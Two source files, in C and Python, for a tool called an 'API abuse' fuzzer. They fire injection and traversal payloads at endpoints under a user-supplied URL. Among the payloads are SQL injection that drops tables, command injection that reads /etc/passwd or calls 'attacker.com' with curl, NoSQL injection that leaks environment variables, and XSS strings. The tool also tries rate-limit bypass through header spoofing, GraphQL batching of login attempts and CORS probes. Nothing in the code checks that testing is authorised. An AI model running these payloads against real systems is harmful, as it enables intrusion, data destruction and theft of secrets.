File: Projects/Offensive/API abuse/api_fuzzer.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <curl/curl.h>
#include <jansson.h>

#define MAX_URL_LENGTH 2048
#define MAX_PAYLOAD_LENGTH 1024
#define MAX_RESPONSE_SIZE 65536

typedef struct {
    char url[MAX_URL_LENGTH];
    char method[16];
    char payload[MAX_PAYLOAD_LENGTH];
    char vulnerability[128];
    char risk[16];
    char evidence[256];
    int response_code;
    double response_time;
} fuzz_result_t;

typedef struct {
    fuzz_result_t* results;
    int count;
    int capacity;
} result_list_t;

// HTTP response structure
typedef struct {
    char* data;
    size_t size;
} http_response_t;

size_t write_callback(void* contents, size_t size, size_t nmemb, http_response_t* response) {
    size_t total_size = size * nmemb;
    response->data = realloc(response->data, response->size + total_size + 1);
    
    if (response->data == NULL) {
        printf("Memory allocation failed\n");
        return 0;
    }
    
    memcpy(&(response->data[response->size]), contents, total_size);
    response->size += total_size;
    response->data[response->size] = '\0';
    
    return total_size;
}

void init_result_list(result_list_t* list) {
    list->capacity = 100;
    list->count = 0;
    list->results = malloc(list->capacity * sizeof(fuzz_result_t));
}

void add_result(result_list_t* list, const fuzz_result_t* result) {
    if (list->count >= list->capacity) {
        list->capacity *= 2;
        list->results = realloc(list->results, list->capacity * sizeof(fuzz_result_t));
    }
    list->results[list->count++] = *result;
}

void test_sql_injection(const char* url, result_list_t* results) {
    printf("Testing SQL Injection on: %s\n", url);
    
    const char* sql_payloads[] = {
        "' OR '1'='1' --",
        "' UNION SELECT 1,2,3 --",
        "'; DROP TABLE users --",
        "' OR SLEEP(5) --",
        NULL
    };
    
    CURL* curl;
    CURLcode res;
    
    curl_global_init(CURL_GLOBAL_DEFAULT);
    
    for (int i = 0; sql_payloads[i] != NULL; i++) {
        char full_url[MAX_URL_LENGTH];
        snprintf(full_url, sizeof(full_url), "%s?id=%s", url, sql_payloads[i]);
        
        http_response_t response;
        response.data = malloc(1);
        response.size = 0;
        
        curl = curl_easy_init();
        if (curl) {
            curl_easy_setopt(curl, CURLOPT_URL, full_url);
            curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_callback);
            curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response);
            curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L);
            curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L);
            
            res = curl_easy_perform(curl);
            
            if (res == CURLE_OK) {
                long response_code;
                curl_easy_getinfo(curl, CURLOPT_RESPONSE_CODE, &response_code);
                
                // Check for SQL errors
                if (strstr(response.data, "sql") != NULL || 
                    strstr(response.data, "syntax") != NULL ||
                    strstr(response.data, "mysql") != NULL) {
                    
                    fuzz_result_t result;
                    strncpy(result.url, url, sizeof(result.url));
                    strncpy(result.method, "GET", sizeof(result.method));
                    strncpy(result.payload, sql_payloads[i], sizeof(result.payload));
                    strncpy(result.vulnerability, "SQL Injection", sizeof(result.vulnerability));
                    strncpy(result.risk, "HIGH", sizeof(result.risk));
                    strncpy(result.evidence, "SQL error in response", sizeof(result.evidence));
                    result.response_code = response_code;
                    result.response_time = 0.0;
                    
                    add_result(results, &result);
                    printf("  [!] SQL Injection vulnerability found!\n");
                }
            }
            
            free(response.data);
            curl_easy_cleanup(curl);
        }
    }
    
    curl_global_cleanup();
}

void test_path_traversal(const char* url, result_list_t* results) {
    printf("Testing Path Traversal on: %s\n", url);
    
    const char* traversal_payloads[] = {
        "../../../etc/passwd",
        "..\\..\\..\\windows\\system32\\drivers\\etc\\hosts",
        "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
        NULL
    };
    
    CURL* curl;
    CURLcode res;
    
    curl_global_init(CURL_GLOBAL_DEFAULT);
    
    for (int i = 0; traversal_payloads[i] != NULL; i++) {
        char full_url[MAX_URL_LENGTH];
        snprintf(full_url, sizeof(full_url), "%s?file=%s", url, traversal_payloads[i]);
        
        http_response_t response;
        response.data = malloc(1);
        response.size = 0;
        
        curl = curl_easy_init();
        if (curl) {
            curl_easy_setopt(curl, CURLOPT_URL, full_url);
            curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_callback);
            curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response);
            curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L);
            
            res = curl_easy_perform(curl);
            
            if (res == CURLE_OK) {
                long response_code;
                curl_easy_getinfo(curl, CURLOPT_RESPONSE_CODE, &response_code);
                
                // Check for sensitive file content
                if (strstr(response.data, "root:") != NULL || 
                    strstr(response.data, "administrator:") != NULL) {
                    
                    fuzz_result_t result;
                    strncpy(result.url, url, sizeof(result.url));
                    strncpy(result.method, "GET", sizeof(result.method));
                    strncpy(result.payload, traversal_payloads[i], sizeof(result.payload));
                    strncpy(result.vulnerability, "Path Traversal", sizeof(result.vulnerability));
                    strncpy(result.risk, "HIGH", sizeof(result.risk));
                    strncpy(result.evidence, "Sensitive file content in response", sizeof(result.evidence));
                    result.response_code = response_code;
                    result.response_time = 0.0;
                    
                    add_result(results, &result);
                    printf("  [!] Path Traversal vulnerability found!\n");
                }
            }
            
            free(response.data);
            curl_easy_cleanup(curl);
        }
    }
    
    curl_global_cleanup();
}

void test_http_methods(const char* url, result_list_t* results) {
    printf("Testing HTTP Methods on: %s\n", url);
    
    const char* methods[] = {
        "GET", "POST", "PUT", "DELETE", "PATCH", "OPTIONS", "TRACE", NULL
    };
    
    CURL* curl;
    CURLcode res;
    
    curl_global_init(CURL_GLOBAL_DEFAULT);
    
    for (int i = 0; methods[i] != NULL; i++) {
        http_response_t response;
        response.data = malloc(1);
        response.size = 0;
        
        curl = curl_easy_init();
        if (curl) {
            curl_easy_setopt(curl, CURLOPT_URL, url);
            curl_easy_setopt(curl, CURLOPT_CUSTOMREQUEST, methods[i]);
            curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_callback);
            curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response);
            curl_easy_setopt(curl, CURLOPT_TIMEOUT, 5L);
            
            res = curl_easy_perform(curl);
            
            if (res == CURLE_OK) {
                long response_code;
                curl_easy_getinfo(curl, CURLOPT_RESPONSE_CODE, &response_code);
                
                // Check for dangerous methods that are allowed
                if ((strcmp(methods[i], "PUT") == 0 || 
                     strcmp(methods[i], "DELETE") == 0 ||
                     strcmp(methods[i], "TRACE") == 0) &&
                    response_code != 405 && response_code != 403) {
                    
                    fuzz_result_t result;
                    strncpy(result.url, url, sizeof(result.url));
                    strncpy(result.method, methods[i], sizeof(result.method));
                    strncpy(result.payload, "HTTP Method Test", sizeof(result.payload));
                    strncpy(result.vulnerability, "Dangerous HTTP Method Enabled", sizeof(result.vulnerability));
                    strncpy(result.risk, "MEDIUM", sizeof(result.risk));
                    snprintf(result.evidence, sizeof(result.evidence), 
                            "Method %s returns %ld", methods[i], response_code);
                    result.response_code = response_code;
                    result.response_time = 0.0;
                    
                    add_result(results, &result);
                    printf("  [!] Dangerous method %s enabled\n", methods[i]);
                }
            }
            
            free(response.data);
            curl_easy_cleanup(curl);
        }
    }
    
    curl_global_cleanup();
}

void generate_report(result_list_t* results) {
    printf("\n=== API FUZZING REPORT ===\n");
    printf("Total vulnerabilities found: %d\n\n", results->count);
    
    for (int i = 0; i < results->count; i++) {
        fuzz_result_t* result = &results->results[i];
        
        printf("Vulnerability #%d:\n", i + 1);
        printf("  URL: %s\n", result->url);
        printf("  Method: %s\n", result->method);
        printf("  Vulnerability: %s\n", result->vulnerability);
        printf("  Risk: %s\n", result->risk);
        printf("  Payload: %s\n", result->payload);
        printf("  Evidence: %s\n", result->evidence);
        printf("  Response Code: %d\n", result->response_code);
        printf("  --------------------\n");
    }
}

void demonstrate_advanced_attacks() {
    printf("\n=== ADVANCED API ATTACK TECHNIQUES ===\n");
    
    printf("\n1. GraphQL Introspection Attack:\n");
    printf("   curl -X POST -H \"Content-Type: application/json\" \\\n");
    printf("   -d '{\"query\":\"{__schema{types{name fields{name type{name}}}}}\"}' \\\n");
    printf("   https://api.target.com/graphql\n");
    
    printf("\n2. GraphQL Batching Attack:\n");
    printf("   [\n");
    printf("     {\"query\": \"mutation { login(email: \\\"test@test.com\\\", password: \\\"test\\\") { token } }\"},\n");
    printf("     {\"query\": \"mutation { login(email: \\\"test@test.com\\\", password: \\\"test2\\\") { token } }\"},\n");
    printf("     ... 1000 more queries\n");
    printf("   ]\n");
    
    printf("\n3. JWT Algorithm Confusion:\n");
    printf("   # Change algorithm from RS256 to HS256\n");
    printf("   # Use public key as HMAC secret\n");
    
    printf("\n4. API Rate Limit Bypass:\n");
    printf("   # Rotate IP headers\n");
    printf("   X-Forwarded-For: 1.1.1.1\n");
    printf("   X-Real-IP: 2.2.2.2\n");
    printf("   X-Client-IP: 3.3.3.3\n");
    
    printf("\n5. NoSQL Injection:\n");
    printf("   {\"$where\": \"this.constructor.constructor('return process')().env\"}\n");
    printf("   {\"username\": {\"$ne\": \"invalid\"}, \"password\": {\"$ne\": \"invalid\"}}\n");
}

int main(int argc, char* argv[]) {
    if (argc != 2) {
        printf("Usage: %s <base_url>\n", argv[0]);
        printf("Example: %s https://api.example.com\n", argv[0]);
        return 1;
    }
    
    printf("API Abuse/Fuzzing Tool - C Edition\n");
    printf("==================================\n");
    
    result_list_t results;
    init_result_list(&results);
    
    // Common API endpoints to test
    const char* endpoints[] = {
        "/api/users",
        "/api/products", 
        "/api/orders",
        "/api/auth",
        "/api/admin",
        "/graphql",
        "/rest/users",
        NULL
    };
    
    for (int i = 0; endpoints[i] != NULL; i++) {
        char full_url[MAX_URL_LENGTH];
        snprintf(full_url, sizeof(full_url), "%s%s", argv[1], endpoints[i]);
        
        printf("\nTesting endpoint: %s\n", full_url);
        
        test_sql_injection(full_url, &results);
        test_path_traversal(full_url, &results);
        test_http_methods(full_url, &results);
    }
    
    generate_report(&results);
    demonstrate_advanced_attacks();
    
    free(results.results);
    
    return 0;
}

File: Projects/Offensive/API abuse/api_fuzzer.py
#!/usr/bin/env python3
import requests
import json
import time
import random
import string
import argparse
import threading
from concurrent.futures import ThreadPoolExecutor
from urllib.parse import urljoin, urlparse
from dataclasses import dataclass
from typing import List, Dict, Any, Optional
import hashlib
import base64
from graphql import build_ast_schema, parse, print_ast
import re

@dataclass
class APIFuzzResult:
    endpoint: str
    method: str
    payload: str
    vulnerability: str
    risk: str
    evidence: str
    response_code: int
    response_time: float

class APIFuzzer:
    def __init__(self, base_url, headers=None):
        self.base_url = base_url.rstrip('/')
        self.session = requests.Session()
        self.session.headers.update(headers or {})
        self.discovered_endpoints = []
        self.fuzz_results = []
        self.rate_limit_delay = 0.1
        
        # Payload libraries
        self.sql_payloads = [
            "' OR '1'='1' --",
            "' UNION SELECT 1,2,3 --",
            "'; DROP TABLE users --",
            "' OR 1=1 --",
            "' OR SLEEP(5) --"
        ]
        
        self.nosql_payloads = [
            '{"$where": "this.constructor.constructor(\'return process.env\')()"}',
            '{"$ne": "invalid"}',
            '{"$gt": ""}',
            '{"$regex": ".*"}',
            '{"$where": "sleep(5000)"}'
        ]
        
        self.command_injection_payloads = [
            '; ls -la',
            '| whoami',
            '&& cat /etc/passwd',
            '`id`',
            '$(curl attacker.com)'
        ]
        
        self.xss_payloads = [
            '<script>alert(1)</script>',
            '<img src=x onerror=alert(1)>',
            'javascript:alert(1)',
            '" onmouseover="alert(1)"',
            "'-alert(1)-'"
        ]
        
        self.path_traversal_payloads = [
            '../../../etc/passwd',
            '..\\..\\..\\windows\\system32\\drivers\\etc\\hosts',
            '%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd',
            '....//....//....//etc/passwd'
        ]
        
        self.graphql_payloads = [
            # Introspection query
            '{__schema{types{name}}}',
            # Deep nested query
            '{user{posts{comments{user{posts{comments{user{id}}}}}}}',
            # Field duplication
            '{user{id name id name id name}}',
            # Batch query
            '[{query: "{users{id}}"}, {query: "{users{email}}"}]'
        ]
        
        # Business logic abuse patterns
        self.business_logic_payloads = {
            'price_manipulation': ['-100', '0', '0.01', '999999'],
            'id_manipulation': ['1', '0', '-1', '999999999'],
            'enumeration': ['admin', 'root', 'test', 'demo'],
            'bypass': ['true', 'false', 'null', 'undefined']
        }
    
    def discover_endpoints(self, spider=True, use_common=True):
        """Discover API endpoints through spidering and common paths"""
        print("[*] Discovering API endpoints...")
        
        common_endpoints = [
            '/api/users', '/api/products', '/api/orders', '/api/auth',
            '/api/admin', '/api/config', '/api/health', '/api/version',
            '/graphql', '/api/graphql', '/v1/graphql',
            '/api/v1/users', '/api/v1/products', '/rest/users'
        ]
        
        discovered = []
        
        # Test common endpoints
        if use_common:
            for endpoint in common_endpoints:
                url = urljoin(self.base_url, endpoint)
                for method in ['GET', 'POST', 'OPTIONS']:
                    try:
                        response = self.session.request(method, url, timeout=5)
                        if response.status_code not in [404, 403]:
                            discovered.append({
                                'url': url,
                                'method': method,
                                'status': response.status_code,
                                'type': 'common'
                            })
                            print(f"    Found: {method} {url} ({response.status_code})")
                    except:
                        pass
        
        # Spider existing endpoints for links
        if spider:
            spider_urls = [self.base_url] + [e['url'] for e in discovered]
            for url in spider_urls:
                try:
                    response = self.session.get(url, timeout=5)
                    # Extract potential API endpoints from response
                    links = re.findall(r'["\'](/api/[^"\']+)["\']', response.text)
                    for link in links:
                        full_url = urljoin(self.base_url, link)
                        if full_url not in [e['url'] for e in discovered]:
                            discovered.append({
                                'url': full_url,
                                'method': 'GET',
                                'status': 'spidered',
                                'type': 'spidered'
                            })
                            print(f"    Spidered: GET {full_url}")
                except:
                    pass
        
        self.discovered_endpoints = discovered
        return discovered
    
    def test_graphql_introspection(self):
        """Test GraphQL introspection endpoints"""
        print("[*] Testing GraphQL introspection...")
        
        graphql_endpoints = [
            '/graphql', '/api/graphql', '/v1/graphql', '/query'
        ]
        
        introspection_query = {
            "query": """
            query IntrospectionQuery {
                __schema {
                    types {
                        name
                        kind
                        fields {
                            name
                            type {
                                name
                                kind
                            }
                        }
                    }
                }
            }
            """
        }
        
        for endpoint in graphql_endpoints:
            url = urljoin(self.base_url, endpoint)
            try:
                response = self.session.post(url, json=introspection_query, timeout=10)
                if response.status_code == 200:
                    data = response.json()
                    if 'data' in data and '__schema' in data['data']:
                        self.fuzz_results.append(APIFuzzResult(
                            endpoint=url,
                            method="POST",
                            payload="Introspection Query",
                            vulnerability="GraphQL Introspection Enabled",
                            risk="MEDIUM",
                            evidence="Full schema exposed via introspection",
                            response_code=200,
                            response_time=0
                        ))
                        print(f"    [!] GraphQL introspection enabled at {url}")
                        
                        # Extract sensitive fields from schema
                        self._analyze_graphql_schema(data['data']['__schema'])
            except Exception as e:
                continue
    
    def _analyze_graphql_schema(self, schema):
        """Analyze GraphQL schema for sensitive fields"""
        sensitive_patterns = [
            'password', 'token', 'secret', 'key', 'auth',
            'admin', 'user', 'email', 'phone', 'ssn'
        ]
        
        for type_info in schema.get('types', []):
            type_name = type_info.get('name', '').lower()
            for pattern in sensitive_patterns:
                if pattern in type_name:
                    print(f"        [!] Sensitive type found: {type_info.get('name')}")
            
            for field in type_info.get('fields', []):
                field_name = field.get('name', '').lower()
                for pattern in sensitive_patterns:
                    if pattern in field_name:
                        print(f"        [!] Sensitive field: {type_info.get('name')}.{field.get('name')}")
    
    def fuzz_parameters(self, endpoint, method="GET", params=None):
        """Fuzz API parameters with various payloads"""
        print(f"[*] Fuzzing {method} {endpoint}")
        
        if params is None:
            # Try to identify parameters from endpoint
            params = self._identify_parameters(endpoint)
        
        test_cases = self._generate_fuzz_cases(params)
        
        for test_case in test_cases:
            try:
                start_time = time.time()
                
                if method.upper() == "GET":
                    response = self.session.get(endpoint, params=test_case['params'], timeout=10)
                else:
                    response = self.session.request(method, endpoint, 
                                                  json=test_case.get('json'),
                                                  data=test_case.get('data'),
                                                  timeout=10)
                
                response_time = time.time() - start_time
                
                # Analyze response for vulnerabilities
                self._analyze_response(endpoint, method, test_case, response, response_time)
                
                time.sleep(self.rate_limit_delay)
                
            except Exception as e:
                print(f"    Error testing {test_case['name']}: {e}")
    
    def _identify_parameters(self, endpoint):
        """Identify potential parameters from endpoint structure"""
        params = {}
        
        # Common parameter patterns
        common_params = {
            'id': ['1', 'test', '../etc/passwd'],
            'user_id': ['1', 'admin', '0'],
            'email': ['test@test.com', "' OR '1'='1"],
            'password': ['password', "' OR '1'='1"],
            'token': ['test', 'null', 'undefined'],
            'limit': ['100', '999999', '-1'],
            'offset': ['0', '-100', '1000000'],
            'sort': ['id', 'name', "'; DROP TABLE--"],
            'search': ['test', '<script>alert(1)</script>']
        }
        
        # Extract parameters from URL path
        path_params = re.findall(r'\{(\w+)\}', endpoint)
        for param in path_params:
            params[param] = common_params.get(param, ['test'])
        
        # Add common query parameters
        for param in ['id', 'user_id', 'email', 'limit', 'offset']:
            if param not in params:
                params[param] = common_params.get(param, ['test'])
        
        return params
    
    def _generate_fuzz_cases(self, params):
        """Generate fuzzing test cases"""
        test_cases = []
        
        # SQL Injection tests
        for payload in self.sql_payloads:
            case_params = {}
            for param_name in params:
                case_params[param_name] = payload
            test_cases.append({
                'name': f'SQLi_{payload[:20]}',
                'params': case_params,
                'type': 'sql_injection'
            })
        
        # NoSQL Injection tests
        for payload in self.nosql_payloads:
            test_cases.append({
                'name': f'NoSQLi_{payload[:20]}',
                'json': json.loads(payload),
                'type': 'nosql_injection'
            })
        
        # Command Injection tests
        for payload in self.command_injection_payloads:
            case_params = {}
            for param_name in params:
                case_params[param_name] = payload
            test_cases.append({
                'name': f'CmdInj_{payload[:20]}',
                'params': case_params,
                'type': 'command_injection'
            })
        
        # XSS tests
        for payload in self.xss_payloads:
            case_params = {}
            for param_name in params:
                case_params[param_name] = payload
            test_cases.append({
                'name': f'XSS_{payload[:20]}',
                'params': case_params,
                'type': 'xss'
            })
        
        # Path Traversal tests
        for payload in self.path_traversal_payloads:
            case_params = {}
            for param_name in params:
                if 'id' in param_name or 'file' in param_name or 'path' in param_name:
                    case_params[param_name] = payload
            if case_params:
                test_cases.append({
                    'name': f'PathTraversal_{payload[:20]}',
                    'params': case_params,
                    'type': 'path_traversal'
                })
        
        # Business logic tests
        for test_type, payloads in self.business_logic_payloads.items():
            for payload in payloads:
                case_params = {}
                for param_name in params:
                    if any(keyword in param_name for keyword in ['price', 'cost', 'amount']):
                        case_params[param_name] = payload
                    elif any(keyword in param_name for keyword in ['id', 'user_id']):
                        case_params[param_name] = payload
                if case_params:
                    test_cases.append({
                        'name': f'BusinessLogic_{test_type}_{payload}',
                        'params': case_params,
                        'type': 'business_logic'
                    })
        
        return test_cases
    
    def _analyze_response(self, endpoint, method, test_case, response, response_time):
        """Analyze response for potential vulnerabilities"""
        
        # SQL Injection detection
        if test_case['type'] == 'sql_injection':
            if any(error in response.text.lower() for error in [
                'sql', 'syntax', 'mysql', 'postgresql', 'ora-', 'microsoft odbc'
            ]):
                self.fuzz_results.append(APIFuzzResult(
                    endpoint=endpoint,
                    method=method,
                    payload=test_case['name'],
                    vulnerability="SQL Injection",
                    risk="HIGH",
                    evidence=f"Database error in response: {response.text[:100]}",
                    response_code=response.status_code,
                    response_time=response_time
                ))
        
        # NoSQL Injection detection
        elif test_case['type'] == 'nosql_injection':
            if response_time > 5:  # Potential NoSQL timing attack
                self.fuzz_results.append(APIFuzzResult(
                    endpoint=endpoint,
                    method=method,
                    payload=test_case['name'],
                    vulnerability="NoSQL Injection (Timing)",
                    risk="MEDIUM",
                    evidence=f"Delayed response: {response_time:.2f}s",
                    response_code=response.status_code,
                    response_time=response_time
                ))
        
        # Command Injection detection
        elif test_case['type'] == 'command_injection':
            if any(output in response.text for output in [
                'root:', 'www-data:', 'bin/bash', 'etc/passwd'
            ]):
                self.fuzz_results.append(APIFuzzResult(
                    endpoint=endpoint,
                    method=method,
                    payload=test_case['name'],
                    vulnerability="Command Injection",
                    risk="HIGH",
                    evidence="Command output found in response",
                    response_code=response.status_code,
                    response_time=response_time
                ))
        
        # XSS detection
        elif test_case['type'] == 'xss':
            if test_case['params'] and any(payload in response.text for payload in self.xss_payloads):
                self.fuzz_results.append(APIFuzzResult(
                    endpoint=endpoint,
                    method=method,
                    payload=test_case['name'],
                    vulnerability="Cross-Site Scripting (XSS)",
                    risk="MEDIUM",
                    evidence="XSS payload reflected in response",
                    response_code=response.status_code,
                    response_time=response_time
                ))
        
        # Path Traversal detection
        elif test_case['type'] == 'path_traversal':
            if any(content in response.text for content in [
                'root:', 'bin/bash', 'daemon:', '/etc/passwd'
            ]):
                self.fuzz_results.append(APIFuzzResult(
                    endpoint=endpoint,
                    method=method,
                    payload=test_case['name'],
                    vulnerability="Path Traversal",
                    risk="HIGH",
                    evidence="Sensitive file content in response",
                    response_code=response.status_code,
                    response_time=response_time
                ))
        
        # Business logic detection
        elif test_case['type'] == 'business_logic':
            if response.status_code == 200 and 'error' not in response.text.lower():
                # Successful manipulation
                self.fuzz_results.append(APIFuzzResult(
                    endpoint=endpoint,
                    method=method,
                    payload=test_case['name'],
                    vulnerability="Business Logic Bypass",
                    risk="MEDIUM",
                    evidence=f"Manipulation successful: {test_case['name']}",
                    response_code=response.status_code,
                    response_time=response_time
                ))
    
    def test_rate_limit_bypass(self, endpoint):
        """Test rate limiting bypass techniques"""
        print(f"[*] Testing rate limiting on {endpoint}")
        
        techniques = [
            {'name': 'Header Spoofing', 'headers': {'X-Forwarded-For': '1.1.1.1'}},
            {'name': 'User Agent Rotation', 'headers': {'User-Agent': 'Mozilla/5.0'}},
            {'name': 'Parameter Pollution', 'params': {'id': '1&id=2'}},
            {'name': 'HTTP Method Switching', 'method': 'POST'}
        ]
        
        for technique in techniques:
            try:
                responses = []
                for i in range(10):  # Rapid requests
                    if technique['name'] == 'HTTP Method Switching':
                        response = self.session.post(endpoint, timeout=5)
                    else:
                        headers = self.session.headers.copy()
                        headers.update(technique.get('headers', {}))
                        response = self.session.get(endpoint, headers=headers, timeout=5)
                    
                    responses.append(response.status_code)
                
                # Check if we got successful responses (not all 429)
                success_count = sum(1 for code in responses if code != 429)
                if success_count > 5:
                    self.fuzz_results.append(APIFuzzResult(
                        endpoint=endpoint,
                        method="GET",
                        payload=technique['name'],
                        vulnerability="Rate Limit Bypass",
                        risk="MEDIUM",
                        evidence=f"Bypassed rate limit using {technique['name']}",
                        response_code=200,
                        response_time=0
                    ))
                    
            except Exception as e:
                continue
    
    def test_graphql_batching(self, graphql_endpoint):
        """Test GraphQL query batching attacks"""
        print(f"[*] Testing GraphQL batching on {graphql_endpoint}")
        
        batch_queries = []
        for i in range(100):  # Create 100 identical queries
            batch_queries.append({
                "query": "query { users { id email } }"
            })
        
        try:
            start_time = time.time()
            response = self.session.post(graphql_endpoint, json=batch_queries, timeout=30)
            response_time = time.time() - start_time
            
            if response.status_code == 200:
                data = response.json()
                if isinstance(data, list) and len(data) > 50:
                    self.fuzz_results.append(APIFuzzResult(
                        endpoint=graphql_endpoint,
                        method="POST",
                        payload="Batch Query (100x)",
                        vulnerability="GraphQL Batch Attack",
                        risk="MEDIUM",
                        evidence=f"Processed {len(data)} queries in batch",
                        response_code=200,
                        response_time=response_time
                    ))
                    
        except Exception as e:
            print(f"    GraphQL batching test failed: {e}")
    
    def test_http_methods(self, endpoint):
        """Test dangerous HTTP methods"""
        print(f"[*] Testing HTTP methods on {endpoint}")
        
        dangerous_methods = ['PUT', 'DELETE', 'PATCH', 'TRACE', 'CONNECT']
        
        for method in dangerous_methods:
            try:
                response = self.session.request(method, endpoint, timeout=5)
                
                if response.status_code not in [405, 403, 404]:
                    self.fuzz_results.append(APIFuzzResult(
                        endpoint=endpoint,
                        method=method,
                        payload="HTTP Method Test",
                        vulnerability="Dangerous HTTP Method Enabled",
                        risk="LOW",
                        evidence=f"Method {method} returns {response.status_code}",
                        response_code=response.status_code,
                        response_time=0
                    ))
                    
            except Exception as e:
                continue
    
    def test_cors_misconfig(self, endpoint):
        """Test CORS misconfigurations"""
        print(f"[*] Testing CORS on {endpoint}")
        
        test_origins = [
            'https://evil.com',
            'http://localhost',
            'null',
            'https://attacker.com'
        ]
        
        for origin in test_origins:
            try:
                headers = {'Origin': origin}
                response = self.session.options(endpoint, headers=headers, timeout=5)
                
                if 'Access-Control-Allow-Origin' in response.headers:
                    allowed_origin = response.headers['Access-Control-Allow-Origin']
                    if allowed_origin == '*' or origin in allowed_origin:
                        self.fuzz_results.append(APIFuzzResult(
                            endpoint=endpoint,
                            method="OPTIONS",
                            payload=f"Origin: {origin}",
                            vulnerability="CORS Misconfiguration",
                            risk="MEDIUM",
                            evidence=f"Allows origin: {allowed_origin}",
                            response_code=response.status_code,
                            response_time=0
                        ))
                        
            except Exception as e:
                continue
    
    def run_comprehensive_scan(self):
        """Run comprehensive API security scan"""
        print("[*] Starting comprehensive API security scan")
        
        # Discovery phase
        self.discover_endpoints()
        
        # GraphQL-specific tests
        self.test_graphql_introspection()
        
        # Test each discovered endpoint
        for endpoint_info in self.discovered_endpoints:
            endpoint = endpoint_info['url']
            method = endpoint_info['method']
            
            # Parameter fuzzing
            self.fuzz_parameters(endpoint, method)
            
            # Rate limiting tests
            self.test_rate_limit_bypass(endpoint)
            
            # HTTP method tests
            self.test_http_methods(endpoint)
            
            # CORS tests
            self.test_cors_misconfig(endpoint)
            
            # GraphQL batching if applicable
            if 'graphql' in endpoint.lower():
                self.test_graphql_batching(endpoint)
    
    def generate_report(self):
        """Generate comprehensive security report"""
        print("\n" + "="*80)
        print("API SECURITY TESTING REPORT")
        print("="*80)
        
        if not self.fuzz_results:
            print("No vulnerabilities found!")
            return
        
        # Group by risk level
        risk_groups = {}
        for result in self.fuzz_results:
            if result.risk not in risk_groups:
                risk_groups[result.risk] = []
            risk_groups[result.risk].append(result)
        
        # Print by risk level
        for risk in ['HIGH', 'MEDIUM', 'LOW']:
            if risk in risk_groups:
                print(f"\n{risk} RISK FINDINGS ({len(risk_groups[risk])}):")
                print("-" * 50)
                
                for finding in risk_groups[risk]:
                    print(f"\nEndpoint: {finding.endpoint}")
                    print(f"Method: {finding.method}")
                    print(f"Vulnerability: {finding.vulnerability}")
                    print(f"Payload: {finding.payload}")
                    print(f"Evidence: {finding.evidence}")
                    print(f"Response Code: {finding.response_code}")
                    print("-" * 30)
        
        # Summary
        total = len(self.fuzz_results)
        high = len(risk_groups.get('HIGH', []))
        medium = len(risk_groups.get('MEDIUM', []))
        low = len(risk_groups.get('LOW', []))
        
        print(f"\nSUMMARY:")
        print(f"Total Findings: {total}")
        print(f"High Risk: {high}")
        print(f"Medium Risk: {medium}")
        print(f"Low Risk: {low}")

def main():
    parser = argparse.ArgumentParser(description='API Abuse/Fuzzing Tool')
    parser.add_argument('url', help='Base URL to test')
    parser.add_argument('--headers', help='Custom headers (JSON format)')
    parser.add_argument('--auth', help='Authorization header value')
    parser.add_argument('--threads', type=int, default=5, help='Number of threads')
    
    args = parser.parse_args()
    
    # Prepare headers
    headers = {}
    if args.headers:
        headers.update(json.loads(args.headers))
    if args.auth:
        headers['Authorization'] = args.auth
    
    # Initialize fuzzer
    fuzzer = APIFuzzer(args.url, headers)
    
    # Run comprehensive scan
    fuzzer.run_comprehensive_scan()
    
    # Generate report
    fuzzer.generate_report()

if __name__ == "__main__":
    main()
